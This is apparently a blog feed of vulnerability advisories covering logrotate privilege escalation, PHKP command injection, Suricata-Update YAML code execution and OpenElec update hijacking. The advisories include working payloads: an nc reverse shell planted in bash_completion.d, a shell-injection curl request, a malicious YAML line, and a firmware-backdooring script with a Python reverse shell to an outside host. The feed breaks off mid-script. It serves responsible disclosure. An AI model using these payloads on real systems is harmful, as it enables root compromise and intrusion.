bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ <span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span> total <span style="color: #000000;">20</span> <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> root root <span style="color: #000000;">11144</span> Oct <span style="color: #000000;">28</span> <span style="color: #000000;">2018</span> grub <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> radiusd radiusd <span style="color: #000000;">33</span> May <span style="color: #000000;">12</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">44</span> detail.1.gz radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;if [ \<span style="color: #780078;">`id -u\`</span> -eq 0 ]; then (/bin/nc -e /bin/bash localhost 3333 &amp;); fi&quot;</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span>detail.1.gz radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ nc <span style="color: #660033;">-nvlp</span> <span style="color: #000000;">3333</span> listening on <span style="color: #7a0874; font-weight: bold;">&#91;</span>any<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000;">3333</span> ... connect to <span style="color: #7a0874; font-weight: bold;">&#91;</span>127.0.0.1<span style="color: #7a0874; font-weight: bold;">&#93;</span> from <span style="color: #7a0874; font-weight: bold;">&#40;</span>UNKNOWN<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span>127.0.0.1<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000;">55526</span> <span style="color: #c20cb9; font-weight: bold;">id</span> <span style="color: #007800;">uid</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #007800;">gid</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #007800;">groups</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span></pre></div></p> <h4>Vulnerable Versions</h4> <p>All versions including 3.0.19</p> <h4>Tested Versions</h4> <p>Name : freeradius<br /> Architecture: x86_64<br /> Version: 3.0.13<br /> Release: 9.el7_5</p> <h4>Impact</h4> <p>An attacker who already achieved a valid shell as user “radiusd” could elevate the privileges to “root”. The fact that another exploit is needed to get a shell lowers the severity from high to low.</p> <h4>Mitigation</h4> <p>Add “su radiusd:radiusd” to all log sections in /etc/logrotate.d/radiusd.<br /> By keeping SELinux in "Enforcing" mode, the “radiusd” user will be limited in the directories he can write to.</p> <h4>References:</h4> <ul> <li><a href="https://access.redhat.com/security/cve/cve-2019-10143">https://access.redhat.com/security/cve/cve-2019-10143</a></li> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">https://nvd.nist.gov/vuln/detail/CVE-2019-10143</a></li> </ul> <h4>Vendor Contact Timeline</h4> <p>2019-05-01Contacting RedHat</p> <p>2019-05-07RedHat opens issue at the vendor bugtracker</p> <p>2019-05-23CVE gets assigned to the issue</p> <p>2019-05-24FreeRadius is skeptical about the “security” impact.</p> <p>2019-11-05Public disclosure</p> <h4>Notes</h4> <p>This CVE is disputed because the vendor <a href="https://freeradius.org/security/">stated</a> that there is no known remote code execution in freeradius that allows an attacker to gain a shell as user “radiusd”.&nbsp; CVE’s are not only assigned for vulnerabilities but also for exposures that allow attacker to have a stronger impact after a successful attack. Therefore we believe that it is important to file this issue as a security related bug.</p> <h4>Advisory URL</h4> <p><a href="https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius">https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=283&amp;2=comment&amp;3=comment" token="xzgwb9J5RcAW7IeFIQPIKtSnh-R_KbIEGwnvGSH1LZI"></drupal-render-placeholder> </section> Mon, 02 Dec 2019 18:11:22 +0000 Hoti 283 at https://tech.feedyourhead.at CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus https://tech.feedyourhead.at/content/Privilege-Escalation-via-Logrotate-in-Gitlab-Omnibus-CVE-2019-15741 <span class="field field--name-title field--type-string field--label-hidden">CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul><li>Identifier: AIT-SA-20190930-01</li> <li>Target: GitLab Omnibus</li> <li>Vendor: GitLab</li> <li>Version: 7.4 through 12.2.1</li> <li>Fixed in Version: 12.2.3, 12.1.8 and 12.0.8</li> <li>CVE: CVE-2019-15741</li> <li>Accessibility: Local</li> <li>Severity: Low</li> <li>Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</li> </ul><h3>Vulnerability Description</h3> <p>GitLab Omnibus sets the ownership of the log directory to the system-user "git", which might let local users obtain root access because of unsafe interaction with logrotate.</p> <h3>Vulnerable Versions</h3> <p>7.4 through 12.2.1</p> <h3>Impact</h3> <p>An attacker who already achieved a valid shell as user “git” could elevate the privileges to “root”. The fact that another exploit is needed to get a shell lowers the severity from high to low.</p> <h3>Advisory URL</h3> <p><a href="http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus">http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus</a></p> <h3>References:</h3> <ul><li><a href="https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/">https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/</a> </li> <li><a href="https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380">https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380</a> </li> <li><a href="https://hackerone.com/reports/578119">https://hackerone.com/reports/578119</a></li> </ul><p> </p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Oct 04 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/git" hreflang="en">git</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=279&amp;2=comment&amp;3=comment" token="tPzTCpXOHPQznS0cKjokuCN09WJl_ncAA7gp79vmOxc"></drupal-render-placeholder> </section> Fri, 04 Oct 2019 11:25:05 +0000 Hoti 279 at https://tech.feedyourhead.at Privilege escalation in groonga-httpd (CVE-2019-11675) https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd <span class="field field--name-title field--type-string field--label-hidden">Privilege escalation in groonga-httpd (CVE-2019-11675)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul> <li>System affected: Debian packages of groonga/-httpd 6.1.5-1</li> <li>Software-Version: 6.1.5-1</li> <li>User-Interaction: Not required</li> <li>Impact: Local root</li> <li>CVE: CVE-2019-11675</li> </ul> <h3>Detailed Description</h3> <p>The path of the logdirectory of groonga-httpd can be manipulated by user groonga:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>groonga total <span style="color: #000000;">8</span> <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> root root <span style="color: #000000;">1296</span> Apr <span style="color: #000000;">25</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">44</span> groonga.log drwxr-xr-x <span style="color: #000000;">2</span> groonga groonga <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">25</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">55</span> httpd</pre></div></pre> <p>The files in /var/log/groonga/httpd/*.log are once a day rotated by logrotate as user root with the following config:</p> <pre> /var/log/groonga/httpd/*.log { daily missingok rotate 30 compress delaycompress notifempty create 640 groonga groonga sharedscripts postrotate . /etc/default/groonga-httpd if [ x"$ENABLE" = x"yes" ]; then /usr/bin/curl --silent --output /dev/null \ "http://127.0.0.1:10041/d/log_reopen" fi endscript } </pre> <p>Due to <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">logrotate is prone to a race-condition</a> it is possible for user "groonga" to replace the directory /var/log/groonga/httpd with a symbolik link to any directory(for example /etc/bash_completion.d). logrotate will place files AS ROOT into /etc/bash_completition.d and set the owner and group to "groonga.groonga". An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse shell will be executed then.</p> <h3>Exploit</h3> <p>A proof-of-concept exploit can be found at <a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></p> <h3>Mitigation</h3> <p>The problem can be mitigated by changing the owner and group of /var/log/groonga to root, or by using the "su option" inside the logrotate-configfile.</p> <h3>Credits</h3> <p>This bug was discovered by Wolfgang Hotwagner(https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 07 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/debian" hreflang="en">Debian</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=278&amp;2=comment&amp;3=comment" token="gm3BXsVi-55Kr8NZ8Sqnkq-hgDkw5pOYeXcWUQ1uut0"></drupal-render-placeholder> </section> Tue, 07 May 2019 20:32:56 +0000 Hoti 278 at https://tech.feedyourhead.at Full Disclosure: Remote-Command-Execution in PHKP https://tech.feedyourhead.at/content/full-disclosure-remote-command-execution-in-phkp <span class="field field--name-title field--type-string field--label-hidden">Full Disclosure: Remote-Command-Execution in PHKP</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul><li>System affected: <a href="https://el-tramo.be/phkp/">PHKP</a></li> <li>Software-Version: including commit <span class="sha-block"><span class="sha user-select-contain">88fd9cfdf14ea4b6ac3e3967feea7bcaabb6f03b</span></span></li> <li>User-Interaction: Not required</li> <li>Impact: Remote-Code-Execution</li> <li>CVE: CVE-2018-1000885</li> </ul><h3>Detailed Description</h3> <p>According to the project-page "PHKP is an implementation of the <a href="https://tools.ietf.org/html/draft-shaw-openpgp-hkp-00">OpenPGP HTTP Keyserver Protocol (HKP)</a> in PHP". Due to unsanitized query parameters in the <a href="https://tools.ietf.org/html/draft-shaw-openpgp-hkp-00#page-3">/pks/lookup-call</a> any shell-command can be injected and executed remotely.</p> <p>In line <a href="https://github.com/remko/phkp/blob/88fd9cfdf14ea4b6ac3e3967feea7bcaabb6f03b/phkp.php#L106-L107">106 of phkp.php the search-parameter "/pks/lookup&amp;op=index" is assigned without any checks and in line 107</a> this variable will be used as a parameter of exec():</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;">  <span style="color: #000088;">$search</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$vars</span><span style="color: #009900;">[</span><span style="color: #0000ff;">'search'</span><span style="color: #009900;">]</span><span style="color: #339933;">;</span> <span style="color: #000088;">$pgp_result</span> <span style="color: #339933;">=</span> pgp_exec<span style="color: #009900;">(</span><span style="color: #0000ff;">"--list-public-keys --list-keys <span style="color: #006699; font-weight: bold;">$search</span>"</span><span style="color: #339933;">,</span> <span style="color: #000088;">$output</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span> </pre></div> <p>It is possible to inject any shell commands using the search-parameter:</p> <p><span class="geshifilter"><code class="bash geshifilter-bash">curl http:<span style="color: #000000; font-weight: bold;">//</span>localhost:<span style="color: #000000;">8008</span><span style="color: #000000; font-weight: bold;">/</span>pks<span style="color: #000000; font-weight: bold;">/</span>lookup?<span style="color: #007800;">op</span>=index<span style="color: #000000; font-weight: bold;">&amp;</span><span style="color: #007800;">search</span>=js<span style="color: #000000; font-weight: bold;">@</span>example.com; <span style="color: #c20cb9; font-weight: bold;">id</span></code></span></p> <p>In line <a href="https://github.com/remko/phkp/blob/88fd9cfdf14ea4b6ac3e3967feea7bcaabb6f03b/phkp.php#L116-L117">116 and 117</a> the same problem occurs again for the "/pks/lookup&amp;op=get"-call. That means that the remote-code-execution occurs in two places.</p> <h3>Proof-Of-Concept</h3> <p>A ordinary lookup coud be the following:</p> <p><img alt="Normal phkp-lookup" data-entity-type="file" data-entity-uuid="83e75e46-8ca9-4cfe-a717-ca2535521734" src="/sites/default/files/inline-images/2018-10-08-13%3A14%3A35.png" /></p> <p>By injecting shell commands to the search-parameter, it is possible to execute any command:</p> <p><img alt="phkp rce" data-entity-type="file" data-entity-uuid="ba2c925d-adac-4faf-a1bb-d5477140702e" src="/sites/default/files/inline-images/phkp-rce.png" /></p> <h3>Mitigation</h3> <p>Currently there is no fix for this bug. The <a href="https://github.com/remko/phkp/issues/1">author was informed on Jul 18 2018</a>. A solution for this problem might be the <a href="http://php.net/manual/en/function.escapeshellcmd.php">escapeshellcmd()-function</a>.</p> <h3>Credits</h3> <p>The remote-code-execution bug was discovered by Wolfgang Hotwagner(https://tech.feedyourhead.at/content/full-disclosure-remote-command-execution-in-phkp)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Oct 08 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=270&amp;2=comment&amp;3=comment" token="cK_p_W5RhnZKxZrNTKP6lTqyEefrgqU5bitXNJBBEVM"></drupal-render-placeholder> </section> Mon, 08 Oct 2018 11:23:39 +0000 Hoti 270 at https://tech.feedyourhead.at Remote-Code-Execution in Suricata-Update https://tech.feedyourhead.at/content/remote-code-execution-in-suricata-update <span class="field field--name-title field--type-string field--label-hidden">Remote-Code-Execution in Suricata-Update</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul> <li>System affected: <a href="https://github.com/OISF/suricata-update">Suricata-Update</a></li> <li>CVE: <a href="https://www.cvedetails.com/cve/CVE-2018-1000167/" title="CVE-2018-1000167 security vulnerability details">CVE-2018-1000167</a></li> <li>Software-Version: 1.0.0a1</li> <li>User-Interaction: Not required</li> <li>Impact: Remote-Code-Execution</li> </ul> <h3>Detailed Description</h3> <p>The list of possible sources for suricata-update is downloaded from "<a href="https://www.openinfosecfoundation.org/rules/index.yaml">https://www.openinfosecfoundation.org/rules/index.yaml</a>" per default. Suricata-Update uses the insecure yaml.load()-function which could lead to remote code execution.</p> <h3>Proof-Of-Concept</h3> <p>Code will be executed if the yaml-file at <a href="https://openinfosecfoundation.org/rules/index.yaml ">https://openinfosecfoundation.org/rules/index.yaml </a>contains the following&nbsp; line:</p> <pre> <code> hello: !!python/object/apply:os.system ['ls -l &gt; /tmp/output'] </code></pre> <p>The vulnerable function can be triggered by "suricata-update list-sources". The locally stored index.yaml will be loaded in this function and the malicious code gets executed.</p> <h3>Solution</h3> <p>The provided fix was released in version <a href="https://github.com/OISF/suricata-update/releases/tag/1.0.0b1">1.0.0b1</a></p> <h3>Credits</h3> <p>The remote-code-execution bug was discovered and fixed by Wolfgang Hotwagner(https://tech.feedyourhead.at/content/remote-code-execution-in-suricata-update)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Apr 06 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/104" hreflang="en">Suricata</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=252&amp;2=comment&amp;3=comment" token="iaDkpmpBwPQ3ATJlCo2tp6Eb54aSg4s9aCSDvoK6Rsc"></drupal-render-placeholder> </section> Fri, 06 Apr 2018 10:39:06 +0000 Hoti 252 at https://tech.feedyourhead.at OpenElec: Remote Code Execution Vulnerability through Man-In-The-Middle(CVE-2017-6445) https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle <span class="field field--name-title field--type-string field--label-hidden">OpenElec: Remote Code Execution Vulnerability through Man-In-The-Middle(CVE-2017-6445) </span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>During my research about update mechanisms of open-source software I discovered vulnerabilities in OpenElec.</p> <h3>Overview</h3> <ul><li>System affected: OpenElec</li> <li>CVE: CVE-2017-6445</li> <li>Vulnerable component: auto-update feature</li> <li>Software-Version: 6.0.3, 7.0.1</li> <li>User-Interaction: Reboot required</li> <li>Impact: Remote Code Execution with root permission</li> </ul><h3>Product Description</h3> <p>According to its <a href="http://openelec.tv/">website</a> "<strong>Open Embedded Linux Entertainment Center (OpenELEC)</strong> is a small Linux based <a href="http://en.wikipedia.org/wiki/Just_enough_operating_system" target="_blank">Just Enough Operating System (JeOS)</a> built from scratch as a platform to turn your computer into a <a href="http://kodi.tv">Kodi</a> media center."</p> <h3>Vulnerability</h3> <p>Automatic updates are disabled by default. After enabling it, OpenElec connects to http://update.openelec.tv/updates.php to find out if there is an update for a newer version. If there is a newer version, openelec will download it from http://releases.openelec.tv/&lt;version&gt;.tar(or any other url returned by update.openelec.tv).</p> <p><img alt="openelec-update-schema" data-entity-type="file" data-entity-uuid="15f13d18-13cc-4322-928a-47b63d91e0f6" src="/sites/default/files/inline-images/OpenElec-Update-Schema.png" /></p> <p>The auto-update feature of OpenElec does neither use encrypted connections nor does it use signed updates. A Man-In-The-Middle could manipulate the update-packages to gain root-access remotely.</p> <p><img alt="openelec-attac" data-entity-type="file" data-entity-uuid="d6818f0c-10bc-400b-b904-46233d12df90" src="/sites/default/files/inline-images/OpenElec-Angriff-Schema_0.png" /></p> <p>In order to run the downloaded firmware, the OpenElec-system has to be rebooted. So at this point user-interaction is required.</p> <h3>Exploit</h3> <p>The following code downloads an openelec-firmware, extracts it, places a reverse-shell into the kodi-startscript and finally generates a backdoored firmware:</p> <p></p><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">#!/bin/bash</span>   <span style="color: #007800;">OPENELEC</span>=<span style="color: #ff0000;">"OpenELEC-RPi2.arm-7.0.1"</span> <span style="color: #007800;">DOWNLOADURL</span>=<span style="color: #ff0000;">"http://releases.openelec.tv/"</span>   <span style="color: #007800;">TMP</span>=<span style="color: #ff0000;">"/tmp"</span>   <span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #007800;">$TMP</span> <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-e</span> <span style="color: #800000;">${OPENELEC}</span>.tar <span style="color: #000000; font-weight: bold;">||</span> <span style="color: #c20cb9; font-weight: bold;">wget</span> <span style="color: #007800;">$DOWNLOADURL</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #800000;">${OPENELEC}</span>.tar <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$OPENELEC</span> <span style="color: #000000; font-weight: bold;">||</span> <span style="color: #c20cb9; font-weight: bold;">tar</span> xvf <span style="color: #800000;">${OPENELEC}</span>.tar   <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #000000; font-weight: bold;">||</span> <span style="color: #c20cb9; font-weight: bold;">mkdir</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root <span style="color: #000000; font-weight: bold;">||</span> unsquashfs <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #007800;">$OPENELEC</span><span style="color: #000000; font-weight: bold;">/</span>target<span style="color: #000000; font-weight: bold;">/</span>SYSTEM   <span style="color: #c20cb9; font-weight: bold;">cat</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>bin<span style="color: #000000; font-weight: bold;">/</span>revshell.sh <span style="color: #cc0000; font-style: italic;">&lt;&lt; EOF #!/bin/bash   while true do python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.12.32.15",5000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &gt; /dev/null 2&gt;&amp;1 done EOF</span>   <span style="color: #c20cb9; font-weight: bold;">chmod</span> <span style="color: #000000;">777</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>bin<span style="color: #000000; font-weight: bold;">/</span>revshell.sh   <span style="color: #c20cb9; font-weight: bold;">awk</span> <span style="color: #ff0000;">'/trap cleanup TERM/ { print; print "/usr/bin/revshell.sh &amp;"; next }1'</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodi.sh <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodievil.sh <span style="color: #c20cb9; font-weight: bold;">mv</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodievil.sh <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodi.sh <span style="color: #c20cb9; font-weight: bold;">chmod</span> <span style="color: #000000;">777</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodi.sh   mksquashfs squashfs-root<span style="color: #000000; font-weight: bold;">/</span> SYS <span style="color: #660033;">-noappend</span> <span style="color: #660033;">-comp</span> <span style="color: #c20cb9; font-weight: bold;">gzip</span>   <span style="color: #c20cb9; font-weight: bold;">mv</span> SYS <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #007800;">$OPENELEC</span><span style="color: #000000; font-weight: bold;">/</span>target<span style="color: #000000; font-weight: bold;">/</span>SYSTEM <span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #007800;">$OPENELEC</span> md5sum target<span style="color: #000000; font-weight: bold;">/</span>SYSTEM <span style="color: #000000; font-weight: bold;">&gt;</span> target<span style="color: #000000; font-weight: bold;">/</span>SYSTEM.md5 <span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #007800;">$TMP</span> <span style="color: #c20cb9; font-weight: bold;">tar</span> cvf <span style="color: #007800;">$OPENELEC</span>.evil.tar <span style="color: 